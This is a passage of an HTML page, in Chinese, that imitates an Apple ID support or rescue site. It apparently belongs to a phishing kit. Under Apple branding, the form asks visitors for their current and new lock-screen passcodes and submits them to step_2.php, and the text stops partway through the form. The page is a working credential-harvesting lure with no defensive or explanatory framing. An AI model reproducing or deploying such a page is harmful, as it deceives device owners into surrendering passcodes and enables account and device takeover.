<html>

<head>
  <meta http-equiv="content-type" content="text/html;charset=utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=Edge">
  <meta content="always" name="referrer">
  <script src="./js/base64.js" type="text/javascript"></script>
  <script src="./js/jquery.js"></script>
</head>

<body>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  <meta name="viewport"
    content="width=device-width, initial-scale=1.0, minimum-scale=0.5, maximum-scale=2.0, user-scalable=yes">
  <title>Apple - Apple ID 紧急救援</title>
  <style type="text/css">
    .STYLE1 {
      font-family: "微软雅黑";
      font-size: 16px;
    }

    body {
      background-image: url(images/001.jpg);

    }

    .STYLE2 {
      font-size: 24px;
      font-weight: bold;
      font-family: "微软雅黑";
      color: #FFFFFF;
    }

    .STYLE4 {
      font-size: 14
    }

    .STYLE5 {
      font-size: 14px;
    }

    .STYLE8 {
      font-family: "微软雅黑";
      font-size: 14px;
      color: #FFFFFF;
    }

    .in_text {
      height: 32px;
      border-radius: 8px;
    }

    .a_class {
      text-decoration: none;
      box-sizing: border-box;
      padding: 1px 6px;
      align-items: flex-start;
      text-align: center;
      cursor: default;
      color: buttontext;
      background-color: buttonface;
      border-width: 2px;
      border-style: outset;
      border-color: buttonface;
      border-image: initial;
      -webkit-appearance: push-button;
      user-select: none;
      white-space: pre;
      -webkit-rtl-ordering: logical;
      text-rendering: auto;
      letter-spacing: normal;
      word-spacing: normal;
      text-transform: none;
      text-indent: 0px;
      text-shadow: none;
      display: inline-block;
      margin: 0em;
      font: 400 13.3333px Arial;
    }
  </style>
  <table width="100%" height="35" border="0" cellpadding="0" cellspacing="0" bgcolor="071b22">
    <tbody>
      <tr>
        <td align="left"><img src="images/02.jpg" width="25" height="35"></td>
        <td align="center"><img src="images/03.jpg" width="30" height="35"></td>
        <td align="right"><img src="images/04.jpg" width="26" height="35"></td>
      </tr>
    </tbody>
  </table>
  <table width="90%" height="95" border="0" align="center" cellpadding="0" cellspacing="0">
    <tbody>
      <tr>
        <td height="73" align="center">
          <span class="STYLE2">欢迎使用 Apple 支持</span><br><br>
          <span class="STYLE8">我们随时提供帮助</span>
        </td>
      </tr>
    </tbody>
  </table>
  <table width="90%" height="96" border="0" align="center" cellpadding="0" cellspacing="0">
    <tbody>
      <tr>
        <td><img src="images/kefu.png" width="310" height="175" style="margin: 0 0 10 0;"></td>
      </tr>
      <tr>
        <td>
          <p class="STYLE1">更改您的锁屏密码？</p>
        </td>
      </tr>
      <tr>
        <td>&nbsp;</td>
      </tr>
    </tbody>
  </table>
  <script language="javascript">
    function chkfrm(afrm) {
      if (afrm.passcode.value == "") {
        alert("锁屏密码不能为空！")
        afrm.passcode.focus();
        return false;
      }
      if (afrm.new_passcode.value == "") {
        alert("新密码不能为空")
        afrm.new_passcode.focus();
        return false;
      }
      return true;
    }
  </script>
  <form onkeydown="ENTER(event);" onsubmit="return chkfrm(this);" method="post" name="form1" action="step_2.php">
    <table width="90%" height="127" border="0" align="center" cellpadding="0" cellspacing="0">
      <tbody>
        <tr>
          <td align="center"><span class="STYLE1"><span
                class="STYLE5">当前屏幕锁密码（passcode）</span><span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span>
          </td>
        </tr>
        <tr>
          <td width="69%" align="center"><input type="text" class="in_text" name="passcode"></td>
        </tr>
        <tr>
          <td align="center"><span class="STYLE1"><span class="STYLE5">更新屏幕锁密码（ new
                passcode）</span><span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span></td>
        </tr>
        <tr>
          <td align="center"><input type="text" class="in_text" name="new_passcode"></td>
        </tr>
      </tbody>
    </table>
    <table width="64%" height="47" border="0" align="center" cellpadding="0" cellspacing="0">
      <tbody>
        <tr>
          <td height="47" align="left"><label>
              <input type="submit" name="Submit" onclick="window.history.back(-1)" value="返   回">
            </label></td>
          <td height="47" align="right"><label>
              <input type="submit" name="Submit" value="下一步">
            </label></td>
        </tr>